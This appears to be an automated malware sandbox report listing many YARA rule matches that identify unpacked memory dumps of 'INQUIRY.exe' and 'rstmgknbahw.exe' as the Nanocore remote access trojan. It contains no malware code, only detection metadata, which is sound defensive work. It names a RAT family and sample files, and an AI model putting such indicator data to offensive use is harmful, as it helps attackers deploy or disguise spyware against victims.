Source: 2.2.INQUIRY.exe.782558.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.INQUIRY.exe.782558.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.INQUIRY.exe.782558.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.INQUIRY.exe.22f1458.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.INQUIRY.exe.22f1458.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.INQUIRY.exe.22f1458.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.rstmgknbahw.exe.2400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.rstmgknbahw.exe.2400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.2.rstmgknbahw.exe.2400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.rstmgknbahw.exe.27c68dc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.rstmgknbahw.exe.27c68dc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.rstmgknbahw.exe.38d3258.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.rstmgknbahw.exe.38d3258.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.rstmgknbahw.exe.38d3258.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.INQUIRY.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.INQUIRY.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.INQUIRY.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.INQUIRY.exe.39a98c0.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.INQUIRY.exe.39a98c0.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.INQUIRY.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.INQUIRY.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.INQUIRY.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.INQUIRY.exe.782558.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.INQUIRY.exe.782558.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.INQUIRY.exe.782558.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.rstmgknbahw.exe.38d3258.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.rstmgknbahw.exe.38d3258.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.rstmgknbahw.exe.38d3258.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.rstmgknbahw.exe.3820e14.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.rstmgknbahw.exe.3820e14.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.INQUIRY.exe.2520000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.INQUIRY.exe.2520000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.INQUIRY.exe.2520000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.INQUIRY.exe.22e0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.INQUIRY.exe.22e0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.INQUIRY.exe.22e0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.rstmgknbahw.exe.4940000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.rstmgknbahw.exe.4940000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.rstmgknbahw.exe.4940000.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.rstmgknbahw.exe.37a3258.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.rstmgknbahw.exe.37a3258.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.rstmgknbahw.exe.37a3258.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.INQUIRY.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.INQUIRY.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.INQUIRY.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.rstmgknbahw.exe.2300000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.rstmgknbahw.exe.2300000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.rstmgknbahw.exe.2300000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.0.INQUIRY.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.INQUIRY.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.INQUIRY.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.rstmgknbahw.exe.2400000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.rstmgknbahw.exe.2400000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.2.rstmgknbahw.exe.2400000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.rstmgknbahw.exe.638d50.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.rstmgknbahw.exe.638d50.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.rstmgknbahw.exe.638d50.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
